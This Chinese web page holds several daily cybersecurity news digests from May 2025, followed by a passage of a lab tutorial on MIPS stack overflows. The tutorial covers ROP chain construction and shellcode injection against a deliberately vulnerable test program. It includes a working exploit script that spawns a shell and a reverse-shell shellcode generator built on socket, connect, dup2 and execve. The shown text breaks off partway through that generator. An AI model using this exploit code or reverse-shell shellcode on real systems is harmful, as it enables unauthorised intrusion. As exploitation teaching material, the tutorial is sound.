ITSM(IT服务管理)解决方案中存在的一处关键身份验证绕过漏洞。该漏洞可能使未经身份验证的攻击者获取受影响系统的管理员权限。 6、CISA将TeleMessage漏洞列入高危漏洞目录 要求三周内完成修复 https://www.freebuf.com/articles/database/430953.html 美国网络安全和基础设施安全局(CISA)已将TeleMessage公司TM SGNL即时通讯应用的严重漏洞列入已知被利用漏洞(KEV)目录,要求联邦机构在三周内采取修复措施。这款曾被特朗普政府官员使用的以色列应用此前发生数据泄露,导致未加密聊天记录暴露。 7、微软2025年5月星期二补丁修复了5个被利用的零日、72个缺陷 https://www.anquanke.com/post/id/307376 今天是 Microsoft 的 2025 年 5 月补丁星期二,其中包括 72 个缺陷的安全更新,其中包括 5 个被积极利用的漏洞和 2 个公开披露的零日漏洞。 8、Android 16扩展了“高级保护”,具有设备级安全性 https://www.anquanke.com/post/id/307379 Google 宣布对 Android 16 中的高级保护功能进行改进,以加强对复杂间谍软件攻击的防御。 9、Horabot恶意软件通过复杂的网络钓鱼攻击拉丁美洲 https://www.anquanke.com/post/id/307373 在最近的一项调查中,FortiGuard Labs 揭露了一个复杂的网络钓鱼活动,该活动传播了 Horabot 恶意软件系列,这是一种针对拉丁美洲讲西班牙语的用户的欺骗性强大威胁。Horabot 利用熟悉的业务通信(西班牙语的假发票电子邮件)将社会工程与分层脚本技术相结合,以实现持久性、凭据盗窃和自动横向传播。 10、Chrome 将阻止管理员级别的浏览器启动以提高安全性 https://www.bleepingcomputer.com/news/google/google-chrome-to-block-admin-level-browser-launches-for-better-security/ Google 正在推出一项针对 Chromium 的更改,以“降权”Google Chrome,使其不以管理员身份运行,从而在 Windows 中提高安全性。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年05月14日
1、APT组织Konni对乌克兰及欧盟外交机构发起网络间谍攻击 https://thehackernews.com/2025/05/north-korean-konni-apt-targets-ukraine.html APT组织Konni近期针对乌克兰政府机构及欧盟外交实体发起网络间谍活动。攻击者通过发送伪装成欧盟政策文件的鱼叉式钓鱼邮件,诱导目标下载恶意LNK文件,进而部署定制化远程控制木马(RAT)。该木马可窃取敏感文件、键盘记录及系统信息,并通过加密通道回传至C2服务器。分析显示,此次攻击主要用于获取俄乌冲突相关情报及欧盟对俄制裁决策细节。目前至少3个乌克兰政府部门和2个欧盟驻外机构受影响,攻击活动最早可追溯至2023年5月。 2、APT37发起名为“Think Tank”的鱼叉式网络钓鱼活动 https://www.genians.co.kr/en/blog/threat_intelligence/toybox-story APT37发起了名为“Think Tank”的鱼叉式网络钓鱼活动,其目标锁定为关注朝鲜的活动人士。攻击者伪装成韩国国家安全智囊团发出邀请,通过邮件分发嵌入了Dropbox链接的压缩档案,该档案中包含恶意LNK文件。攻击者利用与韩国国家安全相关的主题以及实际事件“特朗普2.0时代:前景与韩国的应对”来吸引目标注意,并通过Dropbox云平台分发这些恶意LNK文件。当LNK文件被执行后,它会被配置为通过嵌入参数运行PowerShell命令。该命令触发后,会启动一个 3、摩尔多瓦执法机关逮捕涉嫌DoppelPaymer勒索攻击的嫌疑人 https://thehackernews.com/2025/05/moldovan-police-arrest-suspect-in-45m.html 摩尔多瓦执法机关逮捕了一名45岁的外国男子,怀疑其参与了2021年针对荷兰公司的勒索软件攻击事件。警方查获了超过84,000欧元的现金、电子钱包、两台笔记本电脑、一部手机、一台平板电脑、六张银行卡、两个数据存储设备以及六张内存卡。据调查,该嫌疑人涉嫌与多起网络犯罪活动有关,其中包括针对荷兰公司的勒索软件攻击、勒索及洗钱等行为。其中一起攻击事件针对荷兰科学研究组织(NWO),造成了约450万欧元的损失。该攻击发生在2021年2月,在荷兰科学研 4、Anonymous称窃取了美国航空公司GlobalX的航班数据 https://hackread.com/anonymous-hackers-flight-data-us-deportation-airline-globalx/ 黑客组织Anonymous宣称已成功入侵美国包机航空公司GlobalX,窃取了大量敏感数据,并揭露该公司参与了非法驱逐行动。攻击者通过获取GlobalX开发者的AWS云存储访问令牌,侵入了该公司的数字基础设施,进而窃取了2025年1月19日至5月1日期间的航班日志、乘客名单以及行程细节。这些数据中包含了数百名委内瑞拉移民的驱逐记录,部分乘客在被驱逐时甚至仍在法律申诉阶段。此外,黑客还篡改了GlobalX网站的子域名,发布了一张盖 5、像素隐匿:.NET恶意软件将载荷藏身位图资源 https://www.freebuf.com/articles/430807.html Palo Alto Networks旗下Unit 42团队发现了一种利用隐写术(steganography)的高级混淆技术,攻击者将恶意软件隐藏在看似合法的.NET应用程序位图资源中。这种不断演变的攻击方式正通过恶意垃圾邮件(malspam)活动扩散,主要针对土耳其金融机构和亚洲物流企业。 6、GNU Screen 曝多漏洞:本地提权与终端劫持风险浮现 https://securityonline.info/multiple-cves-in-gnu-screen-local-root-exploit-and-tty-hijacking-discovered/ GNU Screen存在多个高危漏洞,包括本地提权至root(CVE-2025-23395)、终端劫持(CVE-2025-46802)和全局可写PTY(CVE-2025-46803),影响4.9.x和5.0.0版本。SUSE建议避免以setuid-root权限安装,并重构权限模型。 7、黑客开始针对Linux系统测试ClickFix攻击技术 https://www.bleepingcomputer.com/news/security/hackers-now-testing-clickfix-attacks-against-linux-targets/ 安全研究发现APT36组织正将ClickFix攻击技术扩展到Linux系统,通过伪造网站诱导用户执行恶意命令,可能测试感染链有效性。该技术已覆盖Windows、macOS和Linux三大平台,用户需警惕不明命令执行以防数据泄露。 8、macOS远程视图服务沙箱逃逸高危漏洞PoC已公开 https://securityonline.info/poc-released-cve-2025-31258-sandbox-escape-in-macos-via-remoteviewservices/ 苹果修复macOS高危漏洞CVE-2025-31258,该漏洞可突破沙箱限制获取未授权访问。已在Sequoia 15.5版本中修复,PoC代码已公开,建议用户立即更新。 9、Roblox被控秘密采集未成年用户数据 https://hackread.com/roblox-lawsuit-hidden-tracking-monetize-kids-data/ Roblox被控秘密采集未成年用户数据,涉嫌违反儿童隐私保护法,通过隐蔽追踪工具记录键盘输入等敏感信息并分享给第三方。案件若成立将面临重罚,凸显青少年平台数据安全风险。 10、谷歌将因其位置追踪行为向德克萨斯州支付 14 亿美元 https://www.anquanke.com/post/id/307311 谷歌将向美国德克萨斯州支付 14 亿美元,以解决有关未经授权的位置跟踪和面部识别数据保留的诉讼。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年05月13日
1、微软Entra ID遗留协议漏洞致多行业管理员账号遭遇攻击 https://hackread.com/legacy-login-microsoft-entra-id-breach-cloud-accounts/ 微软Entra ID的遗留登录协议存在漏洞,攻击者利用这一漏洞绕过了多因素认证(MFA),对金融、医疗和科技行业的管理员账户发起了攻击。攻击者利用了基本认证版本2 - 资源所有者密码凭证(BAV2ROPC)这一遗留登录方法,该方法允许旧应用程序仅使用简单的用户名和密码进行认证。与现代交互式登录流程不同,BAV2ROPC以非交互式方式运行,这使得攻击者能够完全绕过MFA、条件访问策略等安全措施。此次攻击活动发生在2025年3月18日至4月7日期 2、Linux nftables子系统存在漏洞可导致提权 https://thecyberexpress.com/cve-2024-26809-nftables-vulnerability/ Linux内核的nftables子系统被发现存在一个严重的安全漏洞,编号为CVE-2024-26809。该漏洞属于双释放漏洞,本地攻击者可利用此漏洞提升权限并执行任意代码。nftables是现代Linux发行版中用于网络数据包过滤的子系统,它借助表格、集合、链和规则等组件,能够进行规则匹配。此漏洞存在于nft_set_pipapo的实现中,具体是nft_pipapo_destroy()函数。当集合被标记为“脏”(即已修改但未提交)时,该函数会尝试销毁集合中的所 3、PhaaS网络钓鱼工具包生成伪造的网络钓鱼页面 https://gbhackers.com/phishing-scams-on-the-rise-with-sophisticated-phaas/ 研究人员针对日益复杂的网络钓鱼技术发出警告。当前,这些技术借助专门的网络钓鱼即服务(PhaaS)工具包可以生成伪造的网页。这些工具包让攻击者即便毫无技术经验,也能实时生成伪造的网页。通常,攻击会以一封精心设计的钓鱼邮件开始,从而诱使收件人点击链接。一旦收件人点击链接,就会被导向一个凭证收集的网站。该网站能够动态检索被模仿公司的品牌元素,利用Clearbit等合法的第三方营销服务API,实时获取企业标志和视觉标识符。这种技术营造出了极具迷惑性的假 4、德警方关闭涉及洗钱的eXch加密货币交易所 https://thehackernews.com/2025/05/germany-shuts-down-exch-over-19b.html 德国联邦刑事警察局(BKA)关闭了与洗钱和运营犯罪交易平台有关的eXch加密货币交易所,并扣押了8TB的数据以及价值3400万欧元(约合3825万美元)的加密货币资产,这些资产包括比特币、以太坊、莱特币和达世币。eXch自2014年起开始运营,提供加密货币交换服务,且同时在明网和暗网上开展业务。自eXch成立以来,估计有19亿美元的加密货币资产通过该平台进行转移,其中还包括今年早些时候朝鲜威胁行为者通过攻击Bybit交易所获得的部分非法收益。荷兰财政 5、华硕DriverHub曝严重安全漏洞 用户需立即更新 https://securityonline.info/critical-security-flaws-found-in-asus-driverhub-update-immediately/ 华硕DriverHub曝两大高危漏洞(CVE-2025-3462/3463),攻击者可远程操控主板驱动管理软件。华硕紧急发布1.0.6.0版本修复,用户需立即升级。 6、新型.NET恶意软件"PupkinStealer"窃取浏览器凭证 https://www.freebuf.com/articles/database/430594.html 网络安全公司CYFIRMA向网络安全新闻网站披露,新发现一款名为PupkinStealer的信息窃取型恶意软件。这款基于.NET框架开发的C#程序虽然轻量但功能完备,专门窃取浏览器凭证、桌面文件、即时通讯会话和屏幕截图等敏感数据。 7、AI生成虚假漏洞报告污染漏洞赏金平台 https://cybersecuritynews.com/ai-polluting-bug-bounty-platforms/ AI伪造漏洞报告冲击赏金计划,利用专业术语制造虚假威胁,尤其危害资源不足的开源项目。典型案例显示攻击者通过虚构功能骗取赏金,专家呼吁加强审核以应对日益增长的AI欺诈风险。 8、脸书虚假加密货币交易所广告传播恶意软件 https://hackread.com/fake-crypto-exchange-ads-facebook-spread-malware/ 不法分子通过脸书广告冒用加密货币平台和名人形象,诱导用户下载恶意软件,采用多层攻击架构和精准投放策略,24小时投放超百条广告。Bitdefender提醒用户警惕此类欺诈广告,加强防护措施。 9、Chrome 137 引入设备端 Gemini Nano AI 对抗技术支持诈骗 https://securityonline.info/chrome-137-uses-on-device-gemini-nano-ai-to-combat-tech-support-scams/ Google推出Chrome 137新功能,集成设备端Gemini Nano AI实时拦截技术支持诈骗,弥补云端防护滞后问题,保护隐私同时提升响应速度,标准模式用户也能共享防护成果。 10、微软修复Azure和Power Apps四大高危漏洞 https://securityonline.info/microsoft-patches-four-critical-azure-and-power-apps-vulnerabilities-including-cvss-10-privilege-escalation/ 微软修复Azure和Power Apps四大高危漏洞,包括CVSS满分10.0的Azure DevOps令牌劫持漏洞,凸显云服务安全风险。所有漏洞已平台级修复,用户无需操作。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年05月12日
1、以色列NSO因Pegasus攻击WhatsApp被美国罚款1.68亿美元 https://hackread.com/israeli-nso-group-fine-pegasus-spyware-attack-whatsapp/ 美国加州联邦陪审团裁定以色列间谍软件公司NSO Group需向WhatsApp支付总计约1.68亿美元的赔偿金,包括1.67亿美元惩罚性赔偿及44.47万美元补偿性赔偿。此案源于2019年NSO利用WhatsApp语音通话漏洞(CVE-2019-3568)部署Pegasus间谍软件,非法监控全球1400名用户。被监听的用户包括记者、人权活动家及外交官等。 2、南非航空公司遭受网络攻击 https://thecyberexpress.com/saa-cyberattack-system-restored-same-day/ 南非航空公司(SAA)遭遇网络攻击导致其网站、移动应用程序及部分内部系统出现临时中断,其响应团队迅速采取行动遏制了中断并启动了全面调查。SAA在声明中表示,事件发生后立即启动了灾难管理和业务连续性协议,确保了核心航班运营的稳定,并维持了客户服务中心和销售办公室等关键客户服务渠道的正常运作。目前,SAA已引入独立的数字取证调查人员来确定事件根源,并评估数据泄露的范围,目前尚未确认是否存在客户和员工数据是泄露。 3、Azure存储工具AZNFS-mount漏洞可导致Linux系统权限提升 https://cybersecuritynews.com/azure-storage-utility-vulnerability/ 微软Azure的AZNFS-mount工具(用于通过NFS协议挂载Azure Blob存储)存在权限提升漏洞。该漏洞影响所有版本≤2.0.10的AZNFS-mount组件,主要涉及预装该工具的Azure高性能计算/人工智能(HPC/AI)镜像的Linux系统,攻击者可从未授权用户权限提升至root权限,完全控制系统。 4、攻击者利用仿冒的AI视频生成平台传播Noodlophile窃密木马 https://www.morphisec.com/blog/new-noodlophile-stealer-fake-ai-video-generation-platforms/ 攻击者利用公众对人工智能的兴趣,通过仿冒的AI视频生成平台传播Noodlophile窃密木马。这些平台通过Facebook等社交媒体宣传吸引用户,诱骗用户上传图片或视频进行处理,实际下载的文件中包含Noodlophile窃密木马。攻击链包括多个阶段和组件,包括伪装成视频文件的可执行文件、隐藏文件夹和恶意DLL等,Noodlophile窃密木马可窃取受害者浏览器凭证、加密货币钱包等敏感数据,同时还具备部署其他木马的 5、APT35组织伪造德国模特经纪网站窃取用户设备指纹数据 https://cybersecuritynews.com/iranian-hackers-impersonate-as-model-agency/ 由伊朗支持的黑客组织APT35伪造了德国模特经纪公司的官方网站,并借助高仿的钓鱼网站开展精准网络间谍活动。具体而言,该钓鱼网站会动态加载恶意JavaScript代码。当访问者进入网站时,这些代码便会发挥作用,收集访问者的浏览器配置信息、屏幕分辨率、本地及公网IP地址(其中公网IP地址的获取利用了WebRTC漏洞),还会收集设备指纹。此外,攻击者利用Canvas指纹技术为每个设备生成唯一的标识。随后,他们将IP地址与浏览器指纹相结合,构建出受害者 6、美荷联合执法端掉7000台IoT设备组成的代理僵尸网络 https://thehackernews.com/2025/05/breaking-7000-device-proxy-botnet-using.html 美国与荷兰执法部门联合开展了代号为“Operation Moonlander”的行动,成功摧毁了一个由7000台感染设备(包括物联网设备及已到生命周期(EoL)的系统)构成的代理僵尸网络。该僵尸网络依赖恶意软件TheMoon感染设备,它通过扫描开放端口并利用未修补的漏洞进行传播。此僵尸网络通过anyproxy.net和5socks.net进行运营,为黑客提供匿名代理服务,订阅费用为每月9.95美元至110美元不等,攻击者通过该网络累计非 7、恶意npm包伪装开发工具窃取macOS Cursor IDE用户权限 https://socket.dev/blog/malicious-npm-packages-hijack-cursor-editor-on-macos 研究人员发现一起针对macOS Cursor IDE用户的恶意攻击活动。攻击者通过伪装成开发工具的恶意npm包实施攻击,用于窃取用户凭据并修改文件,从而获得持久的后门访问权限。在本次活动中,研究人员共发现三个恶意npm包。这些包的目标锁定为macOS版的热门Cursor AI代码编辑器。它们伪装成提供Cursor API的开发者工具,诱导用户进行安装使用。一旦用户安装并使用这些npm包,攻击者的恶意行为便会启动。它们会窃取用户凭证,从攻击者 8、黑客使用Blob URI伪造登录页实施精准钓鱼 https://hackread.com/phishing-attack-blob-uri-fake-login-pages-browser/ 安全研究人员发现了一种新型钓鱼攻击,该攻击利用浏览器的Blob URI特性,通过伪造银行、社交媒体等可信域名下的登录页面,诱导用户输入敏感信息。浏览器能够使用Blob来处理临时数据,典型的Blob数据包括图片、音频和PDF文件等二进制内容,用户可以使用Blob URI来访问这些Blob数据。攻击者将恶意代码嵌入到通过JavaScript生成的Blob对象中,从而生成伪合法URL,并利用浏览器同源策略的漏洞绕过传统的域名检测机制。在此次攻击活动中,攻击 9、攻击者通过SEO投毒技术攻击IT管理员 https://cybersecuritynews.com/hackers-attacking-it-admins-by-poisoning-seo/ 安全研究人员发现了一种针对IT管理员的复杂攻击活动。攻击者利用SEO投毒技术,将恶意软件的链接推到搜索引擎结果的顶部。当管理员搜索常用工具时,可能会下载到伪装成合法版本的恶意软件,这些恶意软件含有隐藏的恶意载荷。攻击载荷通常伪装成管理员搜索的合法管理软件,并与后门代码一起运行,以此建立命令和控制渠道而不引起怀疑。在此次攻击活动中,一旦恶意软件被执行,就会部署一个基于.NET框架开发的SMOKEDHAM后门木马程序,该后门木马程序为攻击者提供了 10、PupkinStealer窃密木马窃取浏览器凭据 https://cybersecuritynews.com/pupkinstealer-a-new-net-based-malware-steals-browser-credentials-exfiltrate-via-telegram/ 研究人员发现了一款由新型.NET框架开发的窃密木马PupkinStealer,该木马专门窃取用户浏览器的凭据、桌面文件以及通信应用的会话数据,并通过Telegram Bot实现数据的隐蔽外泄。这款木马自2025年4月起开始活跃,由开发者“Ardent”编写。其主要攻击目标包括基于Chromium内核的Chrome、Edge、Opera等浏览器,能够解密浏览 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
MIPS栈溢出:ROP构造与Shellocde注入
0.前言 前段时间写了DVRF系列的题目,对rop的构造感觉还是有点力不从心,所以深入学习一下怎么构造rop链 注意,全程复现应该用ubuntu16.04,不要用18.04或者20.04,不然很有可能会导致后面的gadget找不到 程序至少也要在ubuntu16.04交叉编译,不然直接在ubuntu18.04或者更高版本下,都有可能有gadget找不到的后果.... 1.MIPS32架构堆栈 跟一般的x86架构不同,mips32架构的函数调用方式与x86系统有很大差别,比如说 mips没有栈底指针,也就是ebp,所以当函数进栈的时候,都是需要将当前指针向下移动n个比特,也就是该函数在堆栈空间所存储的大小n,后面就不再移动指针了,只能在函数返回时将栈指针加上偏移量去恢复栈现场,所以寄存器压栈和出栈的时候都需要指明偏移量 参数传递的方式也跟x86不一样,x86是直接压入栈中,而mips是前4个传入的参数通过$a0-$a3寄存器传递,如果参数超过了4个,那么多余的参数会放入调用参数空间 返回地址也不一样,x86调用函数,就是把函数的返回地址压入堆栈中,而mips是把返回地址放入到$ra寄存器中 2.MIPS函数调用 这里引入一个概念叶子函数和非叶子函数 如果一个函数A中不在调用其他任何函数,那么当前函数A就是一个叶子函数,否则就是非叶子函数 当函数A调用函数B的时候: 首先,call指令会复制当前$PC寄存器的值到$RA寄存器中,然后再跳转到B函数并执行 然后这里要判断B函数是否是叶子函数: 如果是非叶子函数,那么是会把放在$RA寄存器中的函数A的返回地址放到堆栈中 如果是叶子函数,那就不用动,函数A的返回地址还是在$RA寄存器中 函数B执行完之后要返回到函数A时 如果是非叶子函数,就要先从堆栈中把函数A的返回地址取出来,然后存到寄存器$RA中,再使用jr $ra跳转到函数A 如何函数B是叶子函数,就直接jr $ra返回函数A 2.1 函数调用参数传递 #include<stdio.h> int test(int a,int b,int c,int d,int e,int f,int g); int main() {    int v1=0;    int v2=1;    int v3=2;    int v4=3;    int v5=4;    int v6=5;    int v7=6;    test(v1,v2,v3,v4,v5,v6,v7);    return 0; } int test(int a, int b, int c, int d, int e, int f, int g) {    char s[50]={0};    sprintf(s,"%d%d%d%d%d%d%d",a,b,c,d,e,f,g); } 根据刚刚所说的,test函数中有7个参数,前4个参数存放在$a0-$a3寄存器中,后3个参数放入main函数栈顶预留调用参数空间中 在ida静态分析可以看出,main函数分配了7个临时变量 其中var_10-var_1C都是要放在$a0-$a3寄存器中,而剩下的var_30,var_34,var_38要从临时变量取出,存储到main函数预留的调用参数空间 动态调试看看,在sprintf函数处下个断点,那边ubuntu开启qemu模拟,这边ida远程动态链接 sudo chroot . ./qemu-mips-static -g 1234 ./mips-test 当main调用test(v1-v7)时,调用者main会先将前4个参数正序存入$a0-$a3寄存器,再将第5-7个参数按正序压入自己的栈空间,低地址对应v5,高地址递增存放v6、v7 当test内部调用sprintf需要传递9个参数时,test会自行将前4个参数正序存入$a0-$a3,剩余5个参数按正序压入自己的新栈空间,整个过程参数始终按源码中的从左到右顺序传递,且每个函数仅操作自己的寄存器或栈空间,不会涉及其他函数的栈帧,而main 传递的 $a0-$a3,也就是v1-v4在 test 调用 sprintf 时被覆盖,但这些值已通过寄存器或 test 的局部变量(a, b, c, d)保存,因此不会丢失 在 MIPS 调用约定中,main 函数通常不会主动取出或恢复存放到寄存器 $a0-$a3 中的参数值 以下这张图堆栈图是上述程序代码中,main函数调用了test函数之后,还需要原来的寄存器$a0-$a3的值,才会把4个寄存器压入到栈中 2.2 MIPS缓冲区溢出 x86架构下,返回地址一般是放入到堆栈中,所以栈溢出可以劫持程序的执行流 mips架构函数的返回地址一般都是在$ra寄存器中,同样也有栈溢出的风险 非叶子函数 #include<stdio.h> void stack(char *src){    char a[20]={0};    strcpy(a,src); } int main(int argc,char *argv[]){    stack(argv[1]);    return 0; } 由前文所知,stack函数是个非叶子函数,所以进入stack函数之后会把main函数的返回地址放入到自己的堆栈底部中,在返回main函数的时候,就会取出堆栈中的返回地址并写入$ra寄存器,然后跳转到main函数 所以如果stack函数的局部变量发生缓冲区溢出,就有可能覆盖掉main函数的返回地址,从而被劫持程序执行流,这一点跟x86是一样的 叶子函数 #include<stdio.h> void stack(char *src, int count){    char s[20]={0};    int i=0;    for(i=0;i<count;i++){        s[i]=src[i];   } } int main(int argc,char *argv[]) {    int count=strlen(argv[1]);    stack(argv[1],count);    return 0; } 由前文所述,stack函数此时是个叶子函数,main函数的返回地址并不会存放到stack函数自己的堆栈空间中,而是放到了$ra寄存器中,所以在ida显示的汇编语言中,可以看到stack函数在执行最末尾的jr $ra指令之前,都没有对$ra寄存器有任何的操作 所以如果按照x86或者非叶子函数那样的溢出方法,是无法覆盖掉main函数的返回地址的,因为无法操作寄存器$ra 但是呢,如果缓冲区溢出覆盖区域足够大,大到能覆盖掉main函数栈帧中存放的上层函数的返回地址,因为main函数也是个非叶子函数,上层函数的返回地址被main函数放在它自己的堆栈中,所以叶子函数也是可以存在缓冲区溢出的风险的,只要覆盖的数据足够大 举一个完整的例子 #include<stdio.h> #include<sys/stat.h> #include<unistd.h> void do_system(int code,char *cmd) { char buf[255]; system(cmd); } void main() { char buf[256]={0}; char ch; int count=0; unsigned int fileLen=0; struct stat fileData; FILE *fp; if(0==stat("passwd",&fileData)) fileLen=fileData.st_size; else return 1; if((fp=fopen("passwd","rb"))==NULL) { printf("Cannot open file passwd!\n"); exit(1); } ch=fgetc(fp); while(count<=fileLen) { buf[count++]=ch; ch=fgetc(fp); } buf[--count]='\x00'; if(!strcmp(buf,"adminpwd")) { do_system(count,"ls -L"); } else { printf("you have an invalid passord!\n"); } fclose(fp); } 危险函数do_system是一个非叶子函数,main函数也是一个非叶子函数 具体功能是从passwd文件中读取密码,如果密码是"adminpwd",就列出当前目录,否则就显示密码错误并退出程序 创建一个passwd文件然后向其写入500个垃圾数据,然后运行qemu编译过的程序,可以发现程序报错了 python -c "print 'A'*500" > passwd 所以开启一个端口进行远程动态调试,因为ubuntu18.04的原因,导致pwndbg一直报错,无奈只能ida进行远程动态调试了 所以这里配置主要就是ubuntu16.04和ida pro 7.5 不用下断点,直接动态运行,让其崩溃,看看那500个垃圾数据是否能覆盖到内存空间里面 注意这里要关闭掉各种保护,特别是canary保护,不然垃圾数据覆盖不了 mips-linux-gnu-gcc -g -fno-stack-protector -no-pie -fno-pie -z execstack vuln_system.c -static -o vuln_systemsudo chroot . ./qemu-mips-static -g 1234 ./vuln_system 可以看到不仅是内存空间,就连PC寄存器,$ra寄存器,堆栈空间都被覆盖成了垃圾数据,所以这里肯定有栈溢出漏洞,毕竟PC都已经被劫持了 确定可以劫持PC之后,就要精准确定多少字节可以使PC指向期望的地址,也就是要确定偏移量 一般来说用大型字符脚本去确定,通过建立大型字符,然后任取4连续4位,这4位的值在大型字符里面是唯一的,找出覆盖到PC的4个字符在字符集合里面的偏移就可以找到偏移量,通常都是用patternLocOffset.py这个脚本去进行确定 https://github.com/desword/shellcode_tools/blob/master/patternLocOffset.py生成1000个垃圾字符到passwd python patternLocOffset.py -c -l 1000 -f passwd 然后ida动态远程调试,直接让其崩溃,确定PC的地址 可以看到$ra寄存器崩溃的位置在0x34416e35的位置,然后再用patternLocOffset.py去通过劫持的PC地址确定精准偏移量 python patternLocOffset.py -s 0x34416e35 -l 1000 也就是填充404(0x194h)个字节后就可以精准劫持PC了 验证一下 python2 -c "print 'A'*0x194+'BBBBCCCC'" > passwd 可以看到PC和$ra寄存器已经被覆盖成我们想要的BBBBCCCC地址了,这说明404个字节是没错的 确定偏移还有一种方法是栈帧分析,通俗来讲就是静态分析,通过ida显示的数据进行计算得到偏移量 但是我不推荐这种方法,虽然网上还有书上都说可以,但其实我自己去复现了之后发现是行不通的,偏差差太多了,有可能是ida的缘故,也有可能是程序本身在编译的过程中受不同环境影响而偏差,比如说上述例子代码在ida静态分析中计算出来的偏移量就和动态分析出来的不一致,这种情况下还是要以动态的为主,那干脆就一步到位直接动态去确定偏移量就没错了 确定好偏移量之后,就可以确定攻击途径了 根据源代码,该漏洞可以用命令执行,毕竟有一个do_system()函数,或者写shellcode进行攻击 2.2.1 命令执行 这里先介绍命令执行攻击 所以就得跟x86一样构造ROP链,do_system(count,"ls -L")函数有两个参数,由IDA可知其地址为0x00400880 根据前文所说,我们需要找到可以把参数放入$a0和$a1寄存器的gadget 而count是固定字符串,所以只需要找到$a1寄存器的gadget即可 直接在ubuntu用ROPgadget找$a1寄存器的gadget找出来一大堆,而且感觉ROPgadget用来找mips架构的不太好找,不像x86_x64那么方便 所以直接在ida用mipsrop找了 下面这张图是用ubuntu16.04进行mips的交叉编译之后得到的程序所找的gadget,一共是19个gadget 而在此之前,我用了ubuntu18.04进行mips交叉编译得到程序去寻找gadget,只能找到13个 虽然两者都只能找到3个有关$a1寄存器的gadget,但是呢ubuntu18.04那边的gadget最后都只跟$t9寄存器相关 虽说$t9寄存器的值是MIPS程序的函数的起始地址,也就是说MIPS的函数执行机制要求$t9寄存器必须指向当前函数的入口地址,也就是说理论上$t9寄存器可替代$ra控制程序流,但是那得先确保程序中通过 jalr $t9或者类似指令跳转的代码,比如说动态连接函数调用,并且我们还能控制$t9寄存器的值 又或者$t9寄存器的值被保存到堆栈中,且该值可被覆盖,那么这些都是可以控制$t9达到$ra的目的的条件,但很明显,这个例子不具备上述条件,所以自然攻击失败 mipsrop.stackfinders()是一个针对 MIPS二进制文件 的辅助分析命令,帮助漏洞利用开发者快速定位与栈操作相关的ROP gadget 由上到下,我们就选取最后一共0x004474BC地址的gadget,因为其他的gadget要么没有$ra寄存器跳转,要么中间隔得十分远,所以最后一个是最合适的 从gadget看出,我们只要在$sp+0x54+var_3C中构造好字符串,$a1寄存器便可输入我们想要的命令字符串,然后在jr $ra语句时把$ra寄存器覆盖成跳转到do_system函数的地址也就是0x00400A80即可完成整个payload payload: exp.py: import struct print("[*] prepare shellcode") cmd = "sh" cmd += "\00"*(4-(len(cmd) %4))  # 栈对齐 shellcode = "A"*0x194 shellcode += struct.pack(">L",0x004474BC) shellcode += "A"*0x18 #0x18=24 shellcode += cmd shellcode += "B"*(0x3C - len(cmd)) shellcode += struct.pack(">L", 0x00400A80) print("OK!") print("[+] create password file") fw = open('passwd','w') fw.write(shellcode) fw.close() print("ok") 2.2.2 Shellcode 所谓的shellcode就是在缓冲区溢出攻击中植入进程的代码,可以获取shell,执行命令,开启端口等等 一般来说,我们要获取shellcode要么网上搜,要么自己写一个C程序编译后反编译提取汇编指令 而由上述的分析可知,vuln_system存在缓冲区溢出且可以造成命令注入,所以如果要用shellcode攻击的话,可以用execve shellcode让嵌入shellcode的程序运行一个应用程序 但是shellcode可能会遇到NULL的限制导致复制到缓冲区的shellcode是不完整的,所以得进行优化一波,避免出现NULL这样的坏字符 我们还可以建立一个反向连接的shellcode,用来在一个被攻击系统和另一个系统之间建立连接,然后把execve shellcode注入进去,达到命令注入攻击的目的 那就需要socket connect dup2和execve 的shellcode,然后使用NetCat工具,也就是我们常说的NC进行端口监听,看看shellcode有没有成功注入进去 但是这里如果用windows版的nc,都会被Windows defender给杀掉.......最后换了kali,同时要保证kali和ubuntu之间能ping通 通过最开始垃圾数据命令可知,再把0x194个A覆盖后,B覆盖了$ra寄存器和pc寄存器,而C覆盖了后面的地址 所以可以利用C覆盖的这部分地址把B覆盖的放返回地址的寄存器给覆盖了,挟持程序执行流到C覆盖处,而C覆盖处就写入编写好的shellcode 当前栈顶的值是0x7FFFEF90,但是这个堆栈是变化的,所以每一次测试都得重新定位 完整exp_shellcode.py: import struct import socket def makeshellcode(hostip,port):    host=socket.ntohl(struct.unpack('I',socket.inet_aton(hostip))[0])    hosts=struct.unpack('cccc',struct.pack('>L',host))    ports=struct.unpack('cccc',struct.pack('>L',port))    mipshell="\x24\x0f\xff\xfa" #li t7,-6    mipshell+="\x01\xe0\x78\x27" #nor t7,t7,zero    mipshell+="\x21\xe4\xff\xfd" #addi a0,t7,-3    mipshell+="\x21\xe5\xff\xfd" #addi a1,t7,-3    mipshell+="\x28\x06\xff\xff" #slti a2,zero,-1    mipshell+="\x24\x02\x10\x57" #li v0,4183 #sys_socket    mipshell+="\x01\x01\x01\x0c" #syscall 0x40404    mipshell+="\xaf\xa2\xff\xff" #sw v0,-1(sp)    mipshell+="\x8f\xa4\xff\xff" #lw a1,-1(sp)    mipshell+="\x34\x0f\xff\xfd" #li t7,0xfffd    mipshell+="\x01\xe0\x78\x27" #nor t7,t7 zero    mipshell+="\xaf\xaf\xff\xe0" #sw t7,-32(sp)    mipshell+="\x3c\x0e"+struct.pack('2c',ports[2],ports[3]) #lui t6,0x1f90    mipshell+="\x35\xce"+struct.pack('2c',ports[2],ports[3]) #ori t6,t6,0x1f90    mipshell+="\xaf\xae\xff\xe4" #sw t6,-28(sp)    mipshell+="\x3c\x0e"+struct.pack('2c',hosts[0],hosts[1]) 